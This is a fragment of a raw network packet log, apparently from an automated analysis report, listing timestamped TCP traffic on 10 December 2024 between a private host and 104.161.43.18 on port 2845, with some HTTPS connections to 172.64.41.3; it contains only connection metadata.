                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.677329063 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.677849054 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.678272009 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.678375006 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.679189920 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.679392099 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.679410934 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.680654049 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.680669069 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.680676937 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.681299925 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.681325912 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.681354046 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.681929111 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.682102919 CET49790443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.682133913 CET44349790172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.682346106 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.682542086 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.683285952 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.683478117 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.683501005 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.684196949 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.684330940 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.684451103 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.685122013 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.685213089 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.685233116 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.686209917 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.686276913 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.686295033 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.687218904 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.687338114 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.687356949 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.687800884 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.687807083 CET49799443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.687840939 CET44349799172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.687957048 CET49800443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.687964916 CET49801443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.687983036 CET44349800172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.687994003 CET44349801172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.688010931 CET49802443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.688016891 CET44349802172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.688026905 CET49803443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.688033104 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.688146114 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.742997885 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.756231070 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.766457081 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.828048944 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.828216076 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.828280926 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.829262018 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.829277039 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.829418898 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.829427958 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.829744101 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.829911947 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.830091953 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.831008911 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.831166029 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.831188917 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.831998110 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.832168102 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.832190037 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.833082914 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.833211899 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.833250999 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.833936930 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.833993912 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.834093094 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.835119009 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.835165024 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.835258007 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.836071014 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.836232901 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.836251974 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.837158918 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.837173939 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.837291956 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.838063955 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.838131905 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.838218927 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.839263916 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.839397907 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.839623928 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.840148926 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.840193987 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.840303898 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.841093063 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.841105938 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.841156960 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.842333078 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.842535019 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.842556000 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.843162060 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.843307018 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.843578100 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.844369888 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.844532967 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.844592094 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.845326900 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.845406055 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.845468044 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.846347094 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.846359968 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.846441031 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.846450090 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.846456051 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.846497059 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.846719980 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.846735954 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.846796989 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.847599030 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.847769022 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.851412058 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.851432085 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.851447105 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.851459026 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.851474047 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.851485968 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.851490974 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.851500988 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.851502895 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.851516962 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.851805925 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.851937056 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.852401972 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.852750063 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.852843046 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.852859974 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.853777885 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.853904009 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.854007006 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.854875088 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.854939938 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.855209112 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.855812073 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.855956078 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.856031895 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.856908083 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.857047081 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.857047081 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.857872963 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.858001947 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.858100891 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.858923912 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.859134912 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.859395027 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.859954119 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.860105991 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.860126972 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.860995054 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.861156940 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.861273050 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.862001896 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.862113953 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.862168074 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.863070965 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.863182068 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.863208055 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.864162922 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.864233971 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.864325047 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.865292072 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.865307093 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.865348101 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.866187096 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.866254091 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.866269112 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.867166042 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.867235899 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.867400885 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.868240118 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.868278980 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.868355989 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.869326115 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.869338989 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.869426966 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.870217085 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.870280027 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.870321035 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.871294022 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.871514082 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.871550083 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.872428894 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.872442007 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.872530937 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.873321056 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.873368025 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.873713970 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.874412060 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.874553919 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.874699116 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.875399113 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.875504017 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.875670910 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.876599073 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.876610994 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.876832962 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.877096891 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.877111912 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.877190113 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.877947092 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.878051996 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.878120899 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.879082918 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.879204988 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.879472017 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.880193949 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.880265951 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.018812895 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.018934011 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.019001961 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.019360065 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.019500017 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.019561052 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.020580053 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.020667076 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.020724058 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.021497011 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.021591902 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.021667957 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.022571087 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.022584915 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.022686958 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.023355961 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.023377895 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.023828983 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.024342060 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.024408102 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.024960041 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.025268078 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.025460958 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.026046991 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.026228905 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.026698112 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.027230024 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.027348995 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.027410030 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.027451992 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.028297901 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.028438091 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.028760910 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.029315948 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.029463053 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.029975891 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.030383110 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.030447960 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.030533075 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.031347036 CET284549908104.161.43.18192.168.2.6
